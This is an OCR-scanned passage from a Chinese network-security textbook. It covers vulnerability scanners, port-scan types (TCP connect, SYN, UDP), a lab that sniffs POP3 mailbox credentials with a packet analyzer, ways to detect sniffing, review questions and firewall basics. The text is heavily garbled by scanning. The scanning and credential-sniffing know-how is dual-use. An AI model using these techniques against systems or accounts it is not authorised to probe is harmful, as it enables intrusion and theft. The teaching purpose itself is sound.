漏洞 扫描 结束 后 ， 停 止 Analyzer 的 抓 包 ， 然 后 分 析 Analyzer 抓获 的 数据 包 ， 如 图 5.14 所 
示 ， 对 从 192.168.10.5 发 来 的 数据 包 进 行 分 析 ， 可 知 192.168.10.5 对 192.168.10.1 进行 了 端 
和 漏洞 扫描 。 
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图 5.14 被 入 侵 者 进行 网 络 监听 
5.5.2 ”扫描 器 的 组 成 


扫描 器 一 般 是 由 用 户 界 面 、 扫 描 引擎 、 扫 描 方法 集 、 漏 洞 数据 库 、 扫 描 输 出 报告 等 模 
块 组 成 。 整 个 扫描 过 程 由 用 户 界面 驱动 ， 首 先 由 用 户 建立 新 会 话 ， 选 定 扫描 策略 ， 启 动 扫 
描 引擎 ， 然 后 根据 用 户 制订 的 扫描 策略 ， 扫 描 引擎 开始 调度 扫描 方法 ， 扫 描 方法 根据 漏洞 
数据 库 中 的 漏洞 信息 对 目标 系统 进行 扫描 ， 最 后 由 报告 模块 组 织 扫 描 结果 并 输出 。 

扫描 器 的 关键 是 要 有 一 个 组 织 良好 的 漏洞 数据 库 和 相应 的 扫描 方法 集 。 漏 洞 数据 库 是 
核心 ， 一 般 含 漏洞 编号 、 分 类 、 受 影响 系统 、 漏 洞 描述 、 修 补 方法 等 内 容 。 扫 描 方法 集 则 
要 根据 漏洞 描述 内 容 ， 提 取出 漏洞 的 主要 特征 ， 进 一 步 检测 出 这 个 漏洞 的 方法 ， 这 是 一 个 
技术 实现 的 过 程 。 

漏洞 数据 库 的 建立 需要 一 大 批 安 全 专家 和 技术 人 员 长 期 协同 工作 ， 目 前 国内 外 都 有 相应 
的 组 织 开 展 这 方面 的 工作 ， 最 具 影 响 力 的 就 是 CVE(Common Vulnerabilites and Exposures)。 
于 新 的 漏洞 层出不穷 ， 所 以 必须 时 刻 注意 漏洞 数据 库 和 检测 方法 集 的 更 新 。 


5.5.3 漏洞 


漏洞 一 词 是 从 英文 单词 Vulnerability 翻译 而 来 ，Vulnerability 应 译 为 “脆弱 性 ”， 但 是 
中 国 的 技术 人 员 已 经 更 愿意 接受 “漏洞 (Hole)” 这 一 通俗 化 的 名 词 。 

漏洞 是 指 系统 硬件 或 者 软件 存在 某 种 形式 的 安全 方面 的 脆弱 性 ， 从 而 使 得 攻击 者 能 够 
在 未 授权 的 情况 下 访问 、 控 制 系统 。 大 多 数 的 漏洞 体现 在 软件 系统 中 ， 如 操作 系统 软件 、 
网 络 服务 软件 、 各 类 应 用 软件 和 数据 库 系统 及 其 应 用 系统 (如 Web) 等 。 

在 任何 程序 设计 中 都 无 法 绝对 避免 人 为 疏忽 ， 黑 客 正 是 利用 种 种 漏洞 对 网 络 进行 攻 
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击 ， 黑 客 利用 漏洞 完成 各 种 攻击 是 最 终 的 结果 ， 但 是 对 黑客 的 真正 定义 应 该 是 “寻找 漏洞 
的 人 ”， 他 们 不 是 以 攻击 网 络 为 乐趣 ， 而 是 沉迷 于 阅读 他 人 程序 并 力图 找到 其 中 的 漏洞 。 
从 某 种 程度 上 来 说 ， 黑 客 都 是 “好 人 ”， 他 们 为 了 追求 完善 ， 为 了 建立 安全 的 互联 网 。 不 
过 现在 有 很 多 的 伪 黑 客 经 常 利 用 漏洞 做 些 违法 的 事情 。 
由 于 漏洞 对 系统 的 威胁 体现 在 恶意 攻击 行为 对 系统 的 威胁 ， 只 要 利用 硬件 、 软 件 和 策 
各 上 最 薄弱 的 环节 ， 亚 意 攻击 者 就 可 以 得 手 。 因 此 ， 漏 洞 的 危害 可 以 简单 地 用 “ 木 桶 原 
则 ”加 以 说 明 : 一 个 木 桶 能 盛 多 少 水 ， 不 在 于 组 成 它 的 最 长 的 那 根木 料 ， 而 取决 于 最 短 的 
一 根 。 同 样 对 于 一 个 信息 系统 来 说 ， 它 的 安全 性 不 在 于 它 是 否 采用 了 最 新 的 加 密 算法 或 
最 先进 的 设备 ， 而 是 由 系统 本 身 最 薄弱 之 处 决定 。 


5.5.4 ”端口 扫描 


1. 端口 扫描 的 定义 

端口 扫描 是 通过 TCP 或 UDP 的 连接 来 判断 目标 主机 上 是 否 有 相关 的 服务 正在 运行 并 
且 进 行 监听 。 比 如 : 使 用 端口 扫描 器 Advanced Port Scanner 对 某 网 段 进 行 扫描 ， 结 果 如 
5.15 所 示 。 

2. 端口 概述 

端口 在 计算 机 网 络 领 域 中 是 个 非常 重要 的 概念 ， 它 是 专门 为 计算 机 通信 而 设计 的 ， 它 
是 由 计算 机 的 通信 协议 TCP/IP 定义 的 。 其 中 规定 ， 用 卫 地 址 和 端口 作为 套 接 字 ， 它 代表 
TCP 连接 的 一 个 连接 端 ， 一 般 称 为 Socket。 具 体 来 说 ， 就 是 用 [IP: 端 口 ] 来 定位 一 台 主 机 中 
的 某 个 进程 ， 目 的 是 为 了 让 两 台 计算 机 能 够 找到 对 方 的 进程 。 可见， 端口 与 进程 是 一 一 对 
应 的 关系 ， 如 果 某 个 进程 正在 等 待 连接 ， 则 称 该 进程 正在 监听 ， 那 么 就 会 出 现 与 该 进程 相 
对 应 的 端口 。 由 此 可 见 ， 入 侵 者 通过 扫描 端口 ， 就 可 以 判断 目标 计算 机 有 哪些 服务 进程 正 
在 等 待 连接 。 


SelectIP: | 210 . ] 1 | Buserange 
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5.15 用 Advanced Port Scanner 对 某 网 段 进行 扫描 
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3. 端口 的 分 类 


端口 一 般 分 为 两 类 ， 即 熟知 端口 和 一 般 端 

(1) 熟知 端口 (公认 端口 )。 由 ICANN( 互 联网 指派 名 字 和 号 码 公司 ) 负 责 分 配 些 常用 
的 应 用 层 服务 程序 固定 使 用 的 端口 ， 其 值 一 般 为 0 一 1023 。 

(2) 一 般 端 口 。 用 来 随时 分 配给 请 求 通信 的 客户 进程 ， 其 值 一 般 大 于 1023。 

4. 端口 扫描 


端口 扫描 是 指 对 目标 计算 机 的 所 有 或 者 需要 扫描 的 端口 发 送 特定 的 数据 包 ， 然 后 根据 
返回 的 信息 来 分 析 目标 计算 机 的 端口 是 否 打开 、 是 否 可 用 。 

端口 扫描 行为 的 一 个 重要 特征 是 : 在 短 时 期 内 有 很 多 来 自 相同 的 信 源 也 地 址 的 数据 包 
发 往 同一 瑟 地 址 的 不 同 端口 或 不 同 人 P 地 址 的 不 同 端口 。 

5. 端口 扫描 器 

端口 扫描 器 是 一 种 自动 检测 远程 或 本 地 计算 机 安全 性 弱点 的 程序 ， 通 过 使 用 扫描 器 可 
以 不 留 痕迹 地 发 现 远 程 主机 提供 了 哪些 服务 及 版 本 ， 进 而 可 以 了 解 到 远程 计算 机 存在 的 安 
全 问题 。 
于 注意 : ”端口 扫描 器 不 是 直接 攻击 网 络 漏洞 的 程序 ， 只 是 能 够 帮助 发 现 目标 主机 的 某 

些 安全 弱点 。 


端口 扫描 器 在 扫描 过 程 中 主要 具有 以 下 3 个 方面 的 能 
(1) 识别 目标 系统 上 正在 运行 的 TCP/UDP 协议 服务 。 
(2) 识别 目标 系统 的 操作 系统 类 型 。 

(3) 识别 某 个 应 用 程序 或 某 个 特定 服务 的 版 本 号 。 


6. 端口 扫描 的 类 型 


端口 扫描 的 类 型 有 多 种 ， 如 TCPconnect0 扫 描 、SYN 扫描 、SYN/ACK 扫描 、FIN 扫 
描 、XMAS 扫描 、NULL 扫描 、Reset 扫描 和 UDP 扫描 ， 在 此 仅 介 绍 TCPconnect() 扫 描 、 
SYN 扫描 和 UDP 扫描 。 

(1) TCPconnect() 扫 描 。 如 图 5.16 所 示 ，TCPconnect() 扫 描 使 用 TCP 连接 建立 的 “三 次 
握手 ”机 制 ， 建 立 一 个 到 目标 主机 某 端口 的 连接 。 


Syn 
Syn/Ack | OR ;RstAck 
€ ‘ Rst 
被 扫描 者 扫描 者 | 被 扫描 者 扫描 者 
TCPconnect () 扫描 半 开 放 式 扫描 《TCP 的 SYN 扫 描 ) 


5.16 TCPconnect() 扫 描 、SYN 扫描 


中 扫描 者 将 SYN 数据 包 发 往 目标 主机 的 某 端 
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@ 扫描 者 等 待 目标 主机 响应 数据 包 ， 如 果 收 到 SYN/ACK 数据 包 ， 说 明 目 标 端口 正在 
监听 ， 如 果 收 到 RST/ACK 数据 包 ， 说 明 目 标 端口 不 处 于 监听 状态 ， 连 接 被 复位 。 如 果 端 
处 于 非 活动 状态 ， 服 务 器 将 会 发 送 RESET 数据 包 ， 这 将 会 重 置 与 客户 端的 连接 。 

@ 当 扫 描 者 收 到 SYN/ACK 数据 包 后 ， 接 着 发 送 ACK 数据 包 完 成 “三 次 握手 ”。 

@ 当 整 个 连接 过 程 完成 后 ， 结 束 连接 。 

这 种 扫描 容易 被 发 现 ， 目 标 主 机 的 日 志文 件 会 记录 大 量 一 连接 就 断 开 的 信息 。 所 以 出 
现 了 SYN 扫描 。 

(2) SYN 扫描 。 如 图 5.16 所 示 ，TCP 的 SYN 扫描 不 同 于 TCPconnect0 扫 描 ， 因 为 并 不 
建立 一 个 完整 的 TCP 连接 ， 只 是 发 送 一 个 SYN 数据 包 去 建立 一 个 “三 次 握手 ”过 程 ， 等 
待 被 扫描 者 的 响应 ， 如 果 收 到 SYN/ACK 数据 包 ， 则 清楚 地 表明 目标 端口 处 于 监听 状态 ， 
如 果 收 到 的 是 RST/ACK 数据 包 ， 则 表明 目标 端口 处 于 非 监听 状态 。 然 后 发 送 RESET 数据 
包 ， 因 为 没有 建立 完整 的 连接 过 程 ， 目 标 主 机 的 日 志文 件 中 不 会 有 这 种 党 试 扫描 的 记录 。 

(3) UDP 扫描 。UDP 扫描 基础 是 向 一 个 关闭 的 UDP 端口 发 送 数据 时 会 得 到 ICMP 
PORT Unreachable 消息 响应 ， 如 果 向 目标 主机 发 送 UDP 数据 包 ， 没 有 收 到 ICMP PORT 
Unreachable 消息 ， 那 么 可 以 假设 这 个 端口 是 开放 的 。 

UDP 扫描 不 太 可 靠 ， 原 因 有 : 当 UDP 包 在 网 上 传输 时 ， 路 由 器 可 能 会 将 它们 抛弃 ; 
多 数 UDP 服务 在 被 探测 到 时 并 不 做 出 响应 ;防火 墙 通常 配置 为 抛弃 UDP 包 (DNS 除外 ， 
53 端口 )。 


7. 端口 扫描 器 的 类 型 


目前 端口 扫描 器 主要 有 两 类 ， 即 主机 扫描 器 和 网 络 扫描 器 。 

(1) 主机 扫描 器 。 主 机 扫描 器 又 称 本 地 扫描 器 ， 它 与 待 检查 系统 运行 于 同一 节点 ， 执 
行 对 自身 的 检查 。 它 的 主要 功能 为 分 析 各 种 系统 文件 内 容 ， 查 找 可 能 存在 的 对 系统 安全 造 
成 威胁 的 漏洞 或 配置 错误 。 由 于 主机 扫描 器 实际 上 是 运行 于 目标 主机 上 的 进程 ， 因 此 具有 
以 下 特点 。 

Q@ 为 了 运行 某 些 程序 ， 检 测 缓冲 区 溢出 攻击 ， 要 求 扫描 器 可 以 在 系统 上 任意 创建 
进程 。 

@ 可 以 检查 到 安全 补丁 一 级 ， 以 确保 系统 安装 了 最 新 的 安全 补丁 。 

@ 可 以 查看 本 地 系统 配置 文件 ， 检 查 系 统 的 配置 错误 。 

除非 能 攻 入 系统 并 取得 超级 用 户 ( 管 理 员 ) 权 限 ， 或 者 主机 本 身 已 赋予 网 络 扫描 器 的 检 
查 权限 ; 否则 网 络 扫描 器 很 难 实现 以 上 功能 。 所 以 ， 主 机 扫描 器 可 以 检查 出 许多 网 络 扫描 
器 检查 不 出 来 的 问题 。 

(2) 网 络 扫描 器 。 网 络 扫描 器 又 称 远程 扫描 器 ， 通 过 网 络 远程 探测 目标 节点 ， 检 查 安 
全 漏洞 。 与 主机 扫描 器 的 扫描 方法 不 同 ， 网 络 扫描 器 通过 执行 一 整套 综合 的 扫描 方法 集 ， 
发 送 精心 构造 的 数据 包 来 检测 目标 系统 是 否 存在 安全 隐患 。 


5.5.5 ”网 络 监听 及 其 原理 


(1) 网 络 监听 获得 邮箱 的 用 户 名 和 密码 。 在 Windows XP SP2 运行 Analyzer 3.0a12 进 
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行 测试 。 先 运行 Analyzer 3.0a12， 再 使 用 Outlook Express 或 者 Foxmail 收发 邮件 ， 然 后 分 
析 Analyzer 抓获 的 数据 包 ， 如 图 5.17 和 图 5.18 所 示 ， 可 以 看 到 邮箱 的 用 户 名 和 密码 (将 被 
隐藏 )。 


10161964.. " TCF port 11.- 
10161964. TCF port 11 


10161964 TCF port 20 
10161988. Eh FO1B20.. TCF port11 


003058B91400080061038LTB 05 1455L CA 
DS 64 07 DA | 00 6k gD SA | 65 1D AS ERE | 23 AE SO 18 
pp A MD cz 1 00 00 ss 53 1 45 S2 20 6h | 72 6h 77 61 
| 74 6s 72 op | oA 


5.17 TCPconnect() 扫 描 、SYN 扫描 (1) 


于 注意 : ”本 实验 虽然 是 在 同一 台 计 算 机 上 进行 的 ， 但 是 不 影响 网 络 监 听 的 实质 。 在 此 
主要 介绍 网 络 监听 软件 的 使 用 以 及 对 截获 数据 包 的 分 析 。 


(2) 网 络 监听 原理 。 

以 太 网 的 工作 方式 是 将 数据 包 发 送 到 同一 网 段 (共享 式 网 络 ) 所 有 主机 ， 在 数据 包 首部 
包含 应 该 接收 该 数据 包 的 主机 的 MAC 地 址 ， 只 有 与 数据 包 中 的 目的 MAC 地 址 一 致 的 那 
台 主 机 接收 数据 包 ， 但 是 当 一 台 主 机 的 网 卡 工作 在 监听 模式 (或 混杂 模式 )， 不 管 数据 包 中 
的 目的 MAC 地 址 是 什么 ， 主 机 都 将 接收 。 


Eile Ldit Captue hetions Settines Nelp 


191819.41 
101619.44. 
10161954.. 
1016.1954. 


店 国 Pv4 (rternet Protocol version 4) 
外国 Tcp (Tronsmission Cortrol Protoco) 
外国 Pop3 (Post Office Protocol - Version 3) 


图 5.18 TCPconnect() 扫 描 、SYN 扫描 (2) 


但 是 ， 在 交换 式 网 络 环境 中 ， 进 行 网 络 监听 比较 困难 ， 不 过 可 以 通过 ARP 欺骗 的 方 
法 截获 数据 包 进 而 进行 分 析 。 

(3) 网 络 监 听 的 检测 。 由 于 运行 网 络 监听 软件 的 主机 只 是 被 动 地 接收 在 局 域 网 中 传输 
的 数据 包 ， 并 不 主动 与 其 他 主机 交换 信息 ， 也 不 修改 在 网 上 传输 的 数据 包 ， 因 此 发 现 是 否 
存在 网 络 监听 是 比较 困难 的 。 不 过 ， 可 以 使 用 以 下 方法 来 检测 是 否 存 在 网 络 监 听 。 

如 果 怀 疑 某 台 计 算 机 (192.168.0.11) 正 在 进行 网 络 监听 ， 可 以 用 正确 的 全 地 址 
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(192.168.0.11) 和 错误 的 MAC 地 址 (任意 ) 去 ping 对 方 (192.168.0.11)， 如 果 能 够 ping 通 ， 说 
明 192.168.0.11 正在 进行 网 络 监听 。 

(4) 网 络 监听 的 防范 。 尽 量 使 用 路 由 器 和 交换 器 来 组 建 网 络 ， 不 要 使 用 集线器 。 另 
外 ， 要 时 常 关注 是 否 存在 ARP 欺骗 攻 寺 


Em 


复习 思考 题 五 
简 答 题 
1. 简 述 黑客 攻击 的 手段 和 目的 。 
2. 简 述 黑客 攻击 的 步骤 。 
3. 根据 扫描 目标 的 不 同 ， 扫 描 技术 可 分 为 几 大 类 ? 
4. 简 述 TCP 扫描 和 UDP 扫描 的 异同 点 。 
5. 简 述 常用 的 网 络 漏洞 扫描 工具 。 
6. 何谓 网 络 扫描 技术 ? 对 于 网 络 安全 有 何 意义 ? 
7. 何谓 端口 扫描 技术 ? 试 列举 几 种 常见 的 端口 扫描 方式 。 
8. 何谓 栈 指纹 技术 ? 
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学 习 目 标 
系统 学 习 防火 墙 的 基本 概念 与 作用 ， 防 火 墙 的 优 、 缺 点 及 分 类 ， 常 用 的 防火 墙 技术 及 
防火 墙 的 体系 结构 。 了 解 在 选择 防火 墙 时 应 遵循 的 基本 原则 和 应 注意 的 事项 及 防火 墙 技术 
的 发 展 趋势 。 通 过 对 本 章 内 容 的 学 习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 
@。 掌握 防火 墙 基本 概念 与 作用 ， 防 火 墙 的 优 、 缺 点 及 分 类 ， 常 用 的 防火 墙 技术 ( 包 过 
滤 技 术 、 应 用 代理 技术 、 状 态 监 视 技术 )， 防 火 墙 的 体系 结构 。 
@ 了 解 选择 防火 墙 的 基本 原则 和 注意 事项 ， 防 火 墙 技术 的 发 展 趋势 。 


6.1 防火 墙 基本 概念 与 分 类 


随 着 Intemet 的 日 益 普及 ， 越 来 越 多 的 企 事业 单位 开始 通过 互联 网 发 展业 务 和 提供 服 
务 。 然 而 ， 在 互联 网 为 企 事业 单位 提供 方便 的 同时 ， 由 于 其 自身 的 开放 性 ， 也 带 来 了 潜在 
的 安全 威胁 。 目 前 ， 黑 客 对 网 络 的 攻击 方法 已 经 有 几 千 种 ， 而 且 大 多 数 具 有 严重 的 威胁 
性 。 全 世界 现 有 20 多 万 个 黑客 网 站 。 每 当 一 种 新 的 网 络 攻击 手段 出 现 ， 一 周 之 内 便 可 通 
过 互联 网 传 遍 全 世界 。 在 不 断 扩大 的 计算 机 网 络 空间 中 ， 几 乎 到 处 都 有 黑客 的 身影 ， 无 处 
不 遭受 黑客 的 攻击 。 

这 些 安全 威胁 极 大 地 损害 了 人 们 对 互联 网 的 信心 ， 从 而 影响 了 Intemet 更 大 作用 的 发 
挥 。 因 为 没有 有 效 的 安全 保护 ， 很 多 企 事 业 单 位 放 缓 了 将 部 分 业务 或 服务 转移 到 网 上 的 步 
伐 ， 极 大 地 降低 了 工作 效率 。 因 此 ， 如 何 能 够 为 本 组 织 的 网 络 提供 尽 可 能 强大 的 安全 防护 
就 成 为 各 企 事业 单位 的 关注 焦点 。 在 这 种 情况 下 ， 防 火 墙 进入 了 人 们 的 视野 。 


6.1.1 防火 墙 基本 概念 


1. 防火 墙 的 概念 


如 果 一 个 网 络 连接 到 Intemet， 其 内 部 用 户 就 可 以 访问 外 部 世界 并 与 之 通信 ， 同 时 ， 外 
部 世界 也 可 以 访问 该 网 络 并 与 之 交互 。 为 保证 系统 安全 ， 就 需要 在 该 网 络 和 Intemet 之 间 
插入 一 个 中 介 系 统 ， 竖 起 一 道 安全 屏障 ， 以 阻挡 来 自 外 部 网 络 对 本 网 络 的 威胁 和 入 侵 ， 这 
种 中 介 系 统 叫 作 “ 防 火 墙 ”或 “防火 墙 系统 ”。 

防火 墙 是 指 设置 在 不 同 网 络 (如 企业 内 部 网 和 公共 网 ) 或 网 络 安全 域 之 间 的 一 系列 部 件 
的 组 合 ， 它 是 不 同 网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入 口 ， 能 根据 企业 的 安全 策略 控制 
(多 许 、 拒 绝 、 监 测 ) 出 入 网 络 的 信息 流 ， 且 其 本 身 具 有 较 强 的 抗 攻击 能 力 ， 是 提供 信息 安 
全 服务 、 实 现 网 络 和 信息 安全 的 基础 设施 。 

从 实现 方式 来 看 ， 防 火 墙 可 以 分 为 硬件 防火 墙 和 软件 防火 墙 两 类 。 硬 件 防火 墙 是 通过 硬 
件 和 软件 的 结合 来 达到 隔离 内 、 外 部 网 络 的 目的 ， 软 件 防火 墙 则 通过 纯 软 件 的 方式 来 实现 。 

从 逻辑 上 来 看 ， 防 火 墙 是 一 个 分 离 器 、 一 个 限制 器 ， 也 是 一 个 分 析 器 。 它 能 有 效 地 监 
控 内 部 网 和 Intemet 之 间 的 任何 活动 ， 保 障 内 部 网 络 的 安全 。 防 火 墙 示意 图 如 图 6.1 所 示 。 
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图 6.1 防火 墙 示意 图 
2. 其 他 概念 


以 下 是 几 个 有 关 防 火 墙 的 常用 概念 。 

@ 外 部 网 络 (外 网 ): 防火 墙 之 外 的 网 络 ， 一 般 为 Intemet， 默 认为 风险 区 域 。 

@ 内 部 网 络 (内 网 ): 防火 墙 之 内 的 网 络 ， 一 般 为 局 域 网 ， 默 认为 安全 区 域 。 

@ 包 过 滤 : 也 称 为 数据 包 过 滤 ， 是 依据 系统 事先 设 定好 的 过 滤 规 则 ， 检 查 数据 流 中 
的 每 个 数据 包 ， 根 据 数据 包 的 源 地 址 、 目 标 地 址 以 及 端口 等 信息 来 确定 是 否 允许 数据 包 
通过 。 

@ 代理 服务 器 : 是 指 代 表 内 部 网 络 用 户 向 外 部 网 络 中 的 服务 器 进行 连接 请 求 的 程序 。 

@ 状态 检测 技术 : 这 是 第 三 代 网 络 安全 技术 。 状 态 检 测 模 块 在 不 影响 网 络 安全 正常 
工作 的 前 提 下 ， 采 用 抽取 相关 数据 的 方法 对 网 络 通信 的 各 个 层次 实行 检测 ， 并 作为 安全 决 
策 的 依据 。 

@ 虚拟 专用 网 (VPN): 是 一 种 在 公用 网 络 中 配置 的 专用 网 络 。 

漏洞 : 是 系统 中 的 安全 缺陷 ， 漏 洞 可 以 导致 入 侵 者 获取 信息 并 导致 不 正确 的 访问 。 

数据 驱动 攻击 : 入 侵 者 把 一 些 具有 破坏 性 的 数据 藏匿 在 普通 数据 中 传送 到 Intermnet 
主机 上 ， 当 这 些 数据 被 激活 时 就 会 发 生 数据 驱动 攻击 。 例 如 ， 修 改 主机 中 与 安全 有 关 的 文 
件 ， 留 下 更 容易 进入 系统 的 后 门 程序 等 。 

@ IP 地 址 欺骗 : 突破 防火 墙 系统 最 常用 的 方法 是 卫 地 址 欺骗 ， 它 同时 也 是 其 他 一 系 
列 攻击 方法 的 基础 。 入 侵 者 利用 伪造 的 也 地 址 发 送 虚假 的 数据 包 ， 乔 装 成 来 自 内 部 网 的 数 
据 ， 这 种 类 型 的 攻击 非常 危险 。 


6.1.2 防火墙 的 作用 


| 


防火 墙 能 够 隔离 风险 区 域 与 安全 区 域 ， 但 不 会 妨碍 人 们 对 风险 区 域 的 访问 。 防 火 墙 的 
作用 是 监控 进出 网 络 的 信息 ， 仅 让 安全 的 、 符 合 规则 的 信息 进入 内 部 网 络 ， 为 用 户 提供 一 


-AT 


pl PE 计算 机 网 络 信息 安全 (第 2 版 ) 


个 安全 的 网 络 环境 。 

防火 墙 是 加 强 网 络 安全 非常 流行 的 方法 。 在 Intemet 上 超过 1/3 的 Web 网 站 都 是 用 某 
种 形式 的 防火 墙 加 以 保护 的 ， 这 是 对 黑客 防范 最 严密 、 安 全 性 最 强 的 一 种 方式 。 任 何 关 键 
性 的 服务 器 都 应 该 放 在 防火 墙 之 后 。 


1. 防火 墙 的 基本 功能 


从 总 体 上 看 ， 防 火 墙 应 具有 以 下 基本 功能 。 
@ 限制 未 授权 用 户 进入 内 部 网 络 ， 过 滤 掉 不 安全 的 服务 和 非法 用 户 。 
@ 防止 入 侵 者 接近 内 部 网 络 的 防御 设施 ， 对 网 络 攻击 进行 检测 和 报警 。 
@ 限制 内 部 用 户 访问 特殊 站 点 。 

@ 记录 通过 防火 墙 的 信息 内 容 和 活动 ， 为 监视 Intemet 安全 提供 方便 。 
2. 防火 墙 的 特性 


一 个 好 的 防火 墙 系统 应 具有 以 下 特性 。 

Q@ 所 有 在 内 部 网 络 和 外 部 网 络 之 间 传输 的 数据 都 必须 通过 防火 墙 。 

@ 只 有 被 授权 的 合法 数据 ， 即 防火 墙 安全 策略 允许 的 数据 才 可 以 通过 防火 墙 。 

@ 防火 墙 本 身 具 有 预防 入 侵 的 功能 ， 不 受 各 种 攻击 的 影响 。 

@ 人 机 界面 良好 ， 用 户 配置 使 用 方便 、 易 管理 。 系 统管 理 员 可 以 对 防火 墙 进行 设 
置 ， 对 Internet 的 访问 者 、 被 访问 者 、 访 问 协议 以 及 访问 方式 进行 控制 。 


3. 防火 墙 与 病毒 防火 墙 的 区 别 


“病毒 防火 墙 ” 是 与 网 络 防火 墙 不 同 范畴 的 软件 ， 但 由 于 有 着 “防火 墙 ” 的 名 字 ， 容 
易 引 起 混淆 。 实 际 上 ， 这 两 种 产品 之 间 存 在 本 质 区 别 。 

(1) “病毒 防火 墙 ”其 实 应 该 称 为 “病毒 实时 检测 和 清除 系统 ”， 是 反 病毒 软件 的 一 
种 工作 模式 。 当 它 运行 时 ， 会 把 病毒 监控 程序 驻 留 在 内 存 中 ， 随 时 检查 系统 中 是 否 有 病 
毒 ; 一 旦 发 现 有 携带 病毒 的 文件 ， 就 会 马上 激活 杀毒 模块 。 

可 以 看 出 ， 病 毒 防火 墙 不 是 对 进出 网 络 的 病毒 进行 监控 ， 而 是 对 所 有 的 系统 应 用 程序 
进行 监控 ， 由 此 来 保障 用 户 系统 的 “无 毒 ”环境 。 

(2) 网 络 防火 墙 并 不 监控 全 部 的 系统 应 用 程序 ， 它 只 对 存在 网 络 访问 的 那 部 分 应 用 程 
序 进行 监控 。 利 用 网 络 防火 墙 ， 可 以 有 效 地 管理 用 户 系 统 的 网 络 应 用 ， 同 时 保护 系统 不 被 
各 种 非法 的 网 络 攻击 所 伤害 。 

可 以 看 出 ， 网 络 防火 墙 的 主要 功能 是 预防 黑客 入 侵 ， 防 止 木 马 盗 取 机 密 信 息 。 病 毒 防 
火 墙 是 一 种 反 病 毒 软件 ， 主 要 功能 是 查 杀 本 地 病毒 、 木 马 。 两 者 具有 不 同 的 功能 ， 在 安装 
反 病 毒 软 件 的 同时 应 该 安装 网 络 防火 墙 。 


6.1.3 防火墙 的 优 、 缺 点 


1. 优点 


防火 墙 是 加 强 网 络 安全 的 一 种 有 效 手 段 ， 它 具有 以 下 优点 。 
(D 防火 墙 能 强化 安全 策略 。Intemet 上 每 天 都 有 上 百 万 人 在 浏览 信息 ， 不 可 避免 地 会 
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有 一 些 恶 意 用 户 试图 攻击 别人 ， 防 火 墙 充当 了 防止 攻击 现象 发 生 的 “警察 ”， 它 执行 系统 
规定 的 安全 策略 ， 仅 允许 符合 规则 的 信息 通过 。 
(2) 防火 墙 能 有 效 地 记录 Intemet 上 的 活动 。 因 为 所 有 进出 内 部 网 络 的 信息 都 必须 通过 
防火 墙 ， 所 以 防火 墙 能 记录 被 保护 的 内 部 网 络 和 不 安全 的 外 部 网 络 之 间 发 生 的 各 种 事件 。 
(3) 防火 墙 是 一 个 安全 策略 的 检查 站 。 所 有 进出 内 部 网 络 的 信息 都 必须 通过 防火 墙 ， 
防火 墙 便 成 为 一 个 安全 检查 站 ， 把 可 疑 的 访问 拒 之 门 外 。 


2. 缺点 


防火 墙 并 不 是 万 能 的 ， 安 装 了 防火 墙 的 系统 仍然 存在 着 安全 隐患 。 以 下 是 防火 墙 的 一 
些 缺 点 。 

(1) 不 能 防范 恶意 内 部 用 户 。 防 火 墙 可 以 禁止 内 部 用 户 经 过 网 络 发 送 机 密 信 息 ， 但 用 
户 可 以 将 数据 复制 到 磁盘 上 带 出 去 。 如 果 入 侵 者 已 经 进入 防火 墙 内 部 ， 防 火 墙 同 样 无 能 为 
力 。 内 部 用 户 可 以 不 经 过 防火 墙 窃 取 数 据 、 破 坏 硬件 和 软件 ， 这 类 攻击 占 了 全 部 攻击 的 
50% 以 上 。 

(2) 不 能 防范 不 通过 防火 墙 的 连接 。 防 火 墙 能 够 有 效 地 防范 通过 它 传输 的 信息 ， 却 不 
能 防范 不 通过 它 传输 的 信息 。 例 如 ， 如 果 站 点 允许 对 防火 墙 后 面 的 内 部 系统 进行 拨号 访 
问 ， 那 么 防火 墙 绝 对 没有 办 法 阻止 入 侵 者 进行 拨号 入 侵 。 

(3) 不 能 防范 全 部 的 威胁 。 防 火 墙 被 用 来 防范 已 知 的 威胁 ， 性 能 良好 的 防火 墙 设计 方 
案 可 以 防范 某 些 新 的 威胁 ， 但 没有 一 个 防火 墙 能 自动 防御 所 有 新 的 威胁 。 

(4) 防火 墙 不 能 防范 病毒 。 防 火 墙 不 能 防范 从 网 络 上 传染 来 的 病毒 ， 也 不 能 消除 计算 
机 已 存在 的 病毒 。 无 论 防 火 墙 多 么 安全 ， 用 户 都 需要 一 套 防 毒 软 件 来 防范 病毒 。 


6.1.4 ”防火墙 的 分 类 


防火 墙 的 分 类 方式 有 很 多 种 。 根 据 受 保护 的 对 象 ， 可 以 分 为 网 络 防火 墙 和 单机 防火 
墙 ; 根据 防火 墙 主要 部 分 的 形态 ， 可 以 分 为 软件 防火 墙 和 硬件 防火 墙 ， 根 据 防 火 墙 使 用 的 
对 象 ， 可 以 分 为 企业 级 防火 墙 和 个 人 防火 墙 ， 根 据 防火 墙 检 查 数 据 包 的 位 置 ， 可 以 分 为 包 
过 滤 防 火 墙 、 应 用 代理 防火 墙 和 状态 检测 防火 墙 。 

1. 网 络 防火 墙 和 单机 防火 墙 

网 络 防火 墙 是 指 用 来 保护 某 个 网 络 安全 的 防火 墙 ， 目 前 的 防火 墙 大 都 是 网 络 防火 墙 。 

单机 防火 墙 主要 是 为 了 保护 单独 主机 而 设计 的 防火 墙 。 

一 般 说 来 ， 为 了 保护 网 络 中 的 主机 安全 ， 人 们 大 多 选用 网 络 防火 墙 。 但 对 于 网 络 中 一 
些 重要 的 主机 ， 也 需要 给 它们 加 装 单机 防火 墙 。 

2. 软件 防火 墙 和 硬件 防火 墙 

软件 防火 墙 是 指 防火 墙 的 所 有 组 件 都 为 软件 ， 不 需要 专用 的 硬件 设备 ，Check Point 公 
司 的 Firewall-1 就 是 这 样 一 种 防火 墙 。 而 硬件 防火 墙 则 需要 专用 的 硬件 设备 ， 目 前 国内 的 
防火 墙 基本 上 属于 这 一 类 型 。 


.aN. 


TI mm 计算 机 网 络 信息 安全 (第 2 版 ) 


3. 企业 级 防火 墙 和 个 人 防火 墙 

企业 级 防火 墙 主要 为 企业 上 网 服务 。 它 能 够 进行 复合 分 层 保护 ， 支 持 大 规模 本 地 和 远 
程 管理 ， 同 时 和 VPN 相 结合 ， 从 而 扩展 了 安全 联网 基础 设施 ， 并 且 可 以 应 用 于 大 规模 网 
络 。 这 类 防火 墙 提供 了 强大 、 灵 活 的 认证 功能 ， 允 许 企业 配置 它们 对 现 有 的 数据 库 进 行 安 
